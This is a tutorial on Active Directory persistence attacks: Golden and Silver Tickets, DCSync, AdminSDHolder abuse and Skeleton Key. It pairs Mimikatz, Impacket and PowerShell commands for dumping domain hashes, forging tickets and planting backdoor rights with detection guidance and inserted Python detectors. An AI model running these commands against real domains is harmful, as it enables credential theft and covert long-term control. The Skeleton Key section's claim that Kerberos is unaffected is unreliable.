Active Directory Persistence Techniques: A Technical Deep Dive
Once an attacker achieves Domain Admin privileges in an Active Directory environment, the next goal is persistence — maintaining access even after password resets, reboots, and incident response efforts. Understanding these techniques is essential for both red teamers (to demonstrate impact) and blue teamers (to detect and respond). This guide covers the most significant AD persistence mechanisms used in real-world attacks.
Legal notice: These techniques must only be studied and practiced in authorized lab environments (e.g., your own AD lab or platforms like HackTheBox, TryHackMe). Unauthorized use is a serious crime.
Prerequisites
Most AD persistence techniques require Domain Admin or Domain Controller access. Common tools used throughout this guide:
- Mimikatz — credential dumping and ticket manipulation
- Impacket (secretsdump, ticketer, wmiexec) — Python-based AD attack suite
- Rubeus — .NET Kerberos toolkit
1. Golden Ticket Attack
A Golden Ticket is a forged Kerberos Ticket Granting Ticket (TGT) signed with the NTLM hash of the krbtgt account. Because every TGT in a domain is signed by this key, a valid krbtgt hash lets you forge tickets for any user, including non-existent ones, with any group membership, for as long as the hash remains unchanged.
Why It’s Powerful
The krbtgt password is rarely rotated (it must be reset twice to fully invalidate old hashes). A Golden Ticket can be valid for 10 years by default.
Requirements
- Domain SID
- krbtgt account NTLM hash
Step 1: Get the krbtgt Hash
With Mimikatz on the DC:
mimikatz # lsadump::lsa /patch
mimikatz # lsadump::dcsync /user:krbtgt
With Impacket secretsdump:
impacket-secretsdump -just-dc-user krbtgt domain.local/administrator:'Password123!'@dc01.domain.local
Output includes:
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:HASH_HERE:::
Step 2: Get Domain SID
# PowerShell
(Get-ADDomain).DomainSID.Value
# Or: whoami /user (take everything before the last -XXXX)
Step 3: Forge the Golden Ticket
With Mimikatz:
mimikatz # kerberos::golden /user:Administrator /domain:domain.local \
/sid:S-1-5-21-XXXXXXXX-XXXXXXXX-XXXXXXXX \
/krbtgt:KRBTGT_HASH \
/ptt
/ptt (pass-the-ticket) injects it directly into the current session. Use /ticket:golden.kirbi to save it to disk instead.
With Impacket:
impacket-ticketer -nthash KRBTGT_HASH \
-domain-sid S-1-5-21-XXXXXXXX-XXXXXXXX-XXXXXXXX \
-domain domain.local \
Administrator
export KRB5CCNAME=Administrator.ccache
impacket-wmiexec -k -no-pass administrator@dc01.domain.local
Detection
- Event ID 4769 with unusual encryption type (0x17 = RC4 when AES is standard)
- Event ID 4672 for special privilege logon
- Tickets with lifetimes exceeding domain policy (>10 hours)
- Microsoft Defender for Identity alerts on Golden Ticket usage
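The first two detection bullets can be combined into one correlation over 4768/4769 events: a service ticket requested for a principal that no DC ever issued a TGT to, especially one encrypted with RC4 where AES is the norm. The example below is added here and is not from the original article; the event records are constructed to look like SIEM-extracted Security events, and the field names follow the standard 4768/4769 schema.

```python
"""Flag Kerberos 4768/4769 events with Golden Ticket traits.

Added example, not part of the original article. Each record is a dict
carrying the field names a SIEM extracts from Security events 4768 (TGT
issued) and 4769 (service ticket requested). Samples are constructed.
"""

RC4_TYPE = "0x17"   # TicketEncryptionType for RC4-HMAC; AES is 0x11 / 0x12


def _account(name):
    """4769 carries 'user@REALM', 4768 carries 'user'; compare on the bare name."""
    return name.split("@")[0].lower()


def golden_ticket_indicators(events, aes_enforced=True):
    """Return {(user, source_ip): [reasons]} for 4769 requests with Golden Ticket traits.

    Traits scored: a service-ticket request for a principal no DC issued a TGT to
    (a forged TGT never passes through a 4768), and an RC4 ticket where AES is
    standard. Pool events from every DC first, or a TGT issued elsewhere looks
    like a missing 4768.
    """
    tgt_issued = {_account(ev["TargetUserName"]) for ev in events if ev["EventID"] == 4768}
    findings = {}
    for ev in events:
        if ev["EventID"] != 4769:
            continue
        user = _account(ev["TargetUserName"])
        reasons = findings.setdefault((user, ev["IpAddress"]), set())
        if user not in tgt_issued:
            reasons.add("tgs_without_tgt")
        if aes_enforced and ev["TicketEncryptionType"] == RC4_TYPE:
            reasons.add("rc4_ticket")
    return {k: sorted(v) for k, v in findings.items() if v}


# Constructed sample: jdoe obtains a TGT, then a service ticket, normally.
# "Administrator" requests RC4 service tickets from 10.0.0.99 although no DC
# issued that principal a TGT in the window.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "jdoe", "TicketEncryptionType": "0x12",
     "IpAddress": "10.0.0.25"},
    {"EventID": 4769, "TargetUserName": "jdoe@DOMAIN.LOCAL", "ServiceName": "cifs/fs01",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.25"},
    {"EventID": 4769, "TargetUserName": "Administrator@DOMAIN.LOCAL", "ServiceName": "cifs/dc01",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.99"},
    {"EventID": 4769, "TargetUserName": "Administrator@DOMAIN.LOCAL", "ServiceName": "host/dc01",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.99"},
]
```

Either trait alone is a weak signal (a TGT issued before the log window produces the same gap), so treat the pair as a triage lead rather than a verdict.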
2. Silver Ticket Attack
A Silver Ticket is a forged Kerberos Service Ticket (TGS) signed with the NTLM hash of a service account rather than krbtgt. Silver Tickets bypass the DC entirely during authentication — making them harder to detect.
Trade-offs vs Golden Ticket
| Aspect | Golden Ticket | Silver Ticket |
|---|---|---|
| Signed by | krbtgt | Service account |
| DC contact required | No (after initial) | No |
| Scope | All services in domain | Single service only |
| Detection difficulty | Moderate | High (no DC logs) |
Common Service Targets
| Service | SPN Prefix | Access Gained |
|---|---|---|
| CIFS | cifs/ | File shares |
| HOST | host/ | Remote management |
| HTTP | http/ | Web services |
| MSSQL | MSSQLSvc/ | SQL Server |
| LDAP | ldap/ | LDAP queries |
Step 1: Get Service Account Hash
# Dump computer account hash (for CIFS/HOST on the machine itself)
impacket-secretsdump -just-dc-ntlm domain.local/admin:'Password123!'@dc01.domain.local
Step 2: Forge the Silver Ticket
mimikatz # kerberos::golden /user:Administrator /domain:domain.local \
/sid:S-1-5-21-XXXXXXXX-XXXXXXXX-XXXXXXXX \
/target:fileserver01.domain.local \
/service:cifs \
/rc4:MACHINE_ACCOUNT_HASH \
/ptt
After injection, access the share directly: dir \\fileserver01\C$
3. DCSync Attack
DCSync mimics the behavior of a Domain Controller replication request to pull password hashes for any account from the DC — without running code on the DC itself.
Requirements
- Accounts with DS-Replication-Get-Changes and DS-Replication-Get-Changes-All permissions
- These rights are granted by default to Domain Admins, Enterprise Admins, and domain controllers
With Mimikatz
mimikatz # lsadump::dcsync /domain:domain.local /user:krbtgt
mimikatz # lsadump::dcsync /domain:domain.local /all /csv
With Impacket
impacket-secretsdump -just-dc domain.local/administrator:'Password123!'@dc01.domain.local
The /all flag dumps every account’s hash — the complete domain credential store.
Granting DCSync Rights for Persistence
If you have DA access, grant DCSync rights to a low-privilege account so it persists after your DA session ends:
# PowerShell - add DCSync rights to a regular user
$acl = Get-Acl "AD:\DC=domain,DC=local"
$ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule `
([Security.Principal.NTAccount]"domain\lowprivuser"), `
"ExtendedRight", `
"Allow", `
([GUID]"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"), # DS-Replication-Get-Changes
"None", `
([GUID]"00000000-0000-0000-0000-000000000000")
$acl.AddAccessRule($ace)
Set-Acl -Path "AD:\DC=domain,DC=local" -AclObject $acl
Detection
- Event ID 4662 with access mask 0x100 on the domain object
- Microsoft Defender for Identity has dedicated DCSync detection
- Unusual replication traffic from non-DC hosts
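The 4662 bullet becomes actionable once the Properties field is checked for the replication control-access GUIDs and the requesting principal is compared with the known DC computer accounts. The example below is added here and is not part of the original article; the events are constructed to match the 4662 field names, and DC_ACCOUNTS is an assumed stand-in for a real DC inventory.

```python
"""Flag Event ID 4662 records that look like DCSync replication requests.

Added example, not part of the original article. Records are dicts with the
field names a SIEM extracts from Security event 4662; samples are constructed.
DC_ACCOUNTS is an assumption standing in for the domain's real DC inventory.
"""
import re

# Control-access rights that together permit directory replication (DCSync).
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
CONTROL_ACCESS = 0x100             # AccessMask bit for extended (control access) rights
DC_ACCOUNTS = {"DC01$", "DC02$"}   # assumption: the legitimate DC computer accounts
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)


def dcsync_suspects(events, dc_accounts=DC_ACCOUNTS):
    """Return (DOMAIN\\account, [rights]) for each 4662 event in which a
    principal other than a known DC exercised replication control rights."""
    suspects = []
    for ev in events:
        if not (int(ev["AccessMask"], 16) & CONTROL_ACCESS):
            continue
        guids = {g.lower() for g in GUID_RE.findall(ev["Properties"])}
        rights = sorted(REPL_RIGHTS[g] for g in guids if g in REPL_RIGHTS)
        if not rights or ev["SubjectUserName"].upper() in dc_accounts:
            continue                   # unrelated right, or expected DC-to-DC replication
        suspects.append((f'{ev["SubjectDomainName"]}\\{ev["SubjectUserName"]}', rights))
    return suspects


# Constructed samples: DC02 replicating (expected), a user account exercising
# both replication rights on the domain head (DCSync), and unrelated access.
REPL_PROPS = ("%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
              "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}")
SAMPLE_4662 = [
    {"SubjectUserName": "DC02$", "SubjectDomainName": "DOMAIN", "AccessMask": "0x100",
     "ObjectName": "DC=domain,DC=local", "Properties": REPL_PROPS},
    {"SubjectUserName": "lowprivuser", "SubjectDomainName": "DOMAIN", "AccessMask": "0x100",
     "ObjectName": "DC=domain,DC=local", "Properties": REPL_PROPS},
    {"SubjectUserName": "jdoe", "SubjectDomainName": "DOMAIN", "AccessMask": "0x10",
     "ObjectName": "CN=jdoe,CN=Users,DC=domain,DC=local",
     "Properties": "%%7685\n\t{00000000-0000-0000-0000-000000000000}"},  # placeholder GUID
]
```

Some backup and identity-sync products replicate legitimately, so maintain an allowlist of their service accounts alongside the DC inventory rather than tuning the rule out.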
4. AdminSDHolder Abuse
AdminSDHolder is a special AD container that defines the ACL template for protected groups (Domain Admins, Enterprise Admins, etc.). Every 60 minutes, the SDProp process copies AdminSDHolder’s ACL to all protected group members.
The Abuse
If you modify AdminSDHolder’s ACL to grant a low-privilege user Full Control, SDProp will propagate that permission to all Domain Admins — giving your backdoor account control over the most privileged users in the domain, indefinitely.
# Add Full Control on AdminSDHolder for a backdoor user
$backdoor = "domain\backdooruser"
$adminsdholder = [ADSI]"LDAP://CN=AdminSDHolder,CN=System,DC=domain,DC=local"
$rule = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
[Security.Principal.NTAccount]$backdoor,
[System.DirectoryServices.ActiveDirectoryRights]::GenericAll,
[System.Security.AccessControl.AccessControlType]::Allow
)
$adminsdholder.ObjectSecurity.AddAccessRule($rule)
$adminsdholder.CommitChanges()
After the next SDProp cycle (up to 60 minutes, or trigger manually), backdooruser has Full Control over all domain admin accounts — allowing password resets and group membership changes.
Detection
- Monitor ACL changes on CN=AdminSDHolder,CN=System
- Event ID 5136 (directory service object modification)
- Audit the AdminSDHolder ACL regularly with:
Get-Acl "AD:\CN=AdminSDHolder,CN=System,DC=domain,DC=local"
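A regular audit is only useful if the output is compared with a known-good state, since SDProp will faithfully propagate any ACE that has been added. The example below is added here and is not from the original article; it diffs an exported ACL against a baseline snapshot, assuming the ACEs were exported as JSON with `Get-Acl ... | Select-Object -ExpandProperty Access | ConvertTo-Json`, and both snapshots are constructed.

```python
"""Diff the AdminSDHolder ACL against a known-good baseline.

Added example, not part of the original article. Each ACE is a dict with the
three fields Get-Acl exposes per access rule (IdentityReference,
ActiveDirectoryRights, AccessControlType). Both snapshots are constructed.
"""
# Rights that let a trustee take over protected accounts once SDProp copies them.
DANGEROUS = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner", "WriteProperty", "ExtendedRight"}


def ace_key(ace):
    """Normalise an ACE to a hashable tuple; Get-Acl joins rights with ', '."""
    rights = frozenset(r.strip() for r in ace["ActiveDirectoryRights"].split(","))
    return (ace["IdentityReference"].lower(), rights, ace["AccessControlType"])


def audit_adminsdholder(current, baseline):
    """Return ACEs present now but absent from the baseline, tagged by severity.

    Removed ACEs are not reported: the risk from this container is what has
    been added to it, because SDProp stamps every addition onto all protected
    accounts within the hour."""
    known = {ace_key(a) for a in baseline}
    findings = []
    for ace in current:
        key = ace_key(ace)
        if key in known:
            continue
        high = bool(key[1] & DANGEROUS) and key[2] == "Allow"
        findings.append({"trustee": ace["IdentityReference"], "rights": sorted(key[1]),
                         "severity": "high" if high else "review"})
    return findings


# Constructed baseline captured while the container was known-good.
BASELINE_ACL = [
    {"IdentityReference": "NT AUTHORITY\\SYSTEM", "ActiveDirectoryRights": "GenericAll",
     "AccessControlType": "Allow"},
    {"IdentityReference": "DOMAIN\\Domain Admins", "AccessControlType": "Allow",
     "ActiveDirectoryRights": "CreateChild, Self, WriteProperty, ExtendedRight, GenericRead, WriteDacl, WriteOwner"},
    {"IdentityReference": "NT AUTHORITY\\Authenticated Users", "ActiveDirectoryRights": "GenericRead",
     "AccessControlType": "Allow"},
]
# Constructed current export: the backdoor ACE from the section above plus a benign read grant.
CURRENT_ACL = BASELINE_ACL + [
    {"IdentityReference": "DOMAIN\\backdooruser", "ActiveDirectoryRights": "GenericAll",
     "AccessControlType": "Allow"},
    {"IdentityReference": "DOMAIN\\Helpdesk", "ActiveDirectoryRights": "ReadProperty",
     "AccessControlType": "Allow"},
]
```

Run the same comparison against accounts with adminCount=1 as well: a rogue ACE that was added and then removed from AdminSDHolder persists on the protected objects until the next SDProp cycle re-stamps them.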
5. Skeleton Key Attack
A Skeleton Key patches the LSASS process on a Domain Controller to accept a universal password for all accounts without changing actual passwords — a true backdoor.
Deploying with Mimikatz
mimikatz # privilege::debug
mimikatz # misc::skeleton
After this, any account can authenticate with either their real password or the skeleton key password: mimikatz (default).
Limitations
- Does not survive a DC reboot (LSASS memory only)
- Detected by EDR solutions monitoring LSASS patching
- Does not work with Kerberos RC4/AES encryption — Kerberos authentication is unaffected; only NTLM-based auth uses the skeleton key
Detection
- Event ID 7045 (new service installed — Mimikatz uses a driver)
- LSASS process memory modification alerts (Windows Defender Credential Guard prevents this entirely)
- Behavioral analytics on unusual LSASS access patterns
Defense Summary
| Technique | Primary Detection | Prevention |
|---|---|---|
| Golden Ticket | MDI alerts, ticket anomalies | Rotate krbtgt twice, enable AES |
| Silver Ticket | Service usage anomalies | Monitor NTLM service auth |
| DCSync | Event 4662, MDI | Audit DS-Replication rights |
| AdminSDHolder | Event 5136, ACL audit | Monitor SDProp container |
| Skeleton Key | LSASS alerts | Credential Guard, EDR |
Summary
AD persistence techniques are sophisticated attacks that exploit fundamental Kerberos and AD design features. The Golden Ticket and DCSync are the most impactful because they are domain-wide in scope and can survive nearly any remediation that does not include a krbtgt double-reset. Building a home AD lab and practicing detection alongside exploitation is the most effective way to deeply understand these techniques.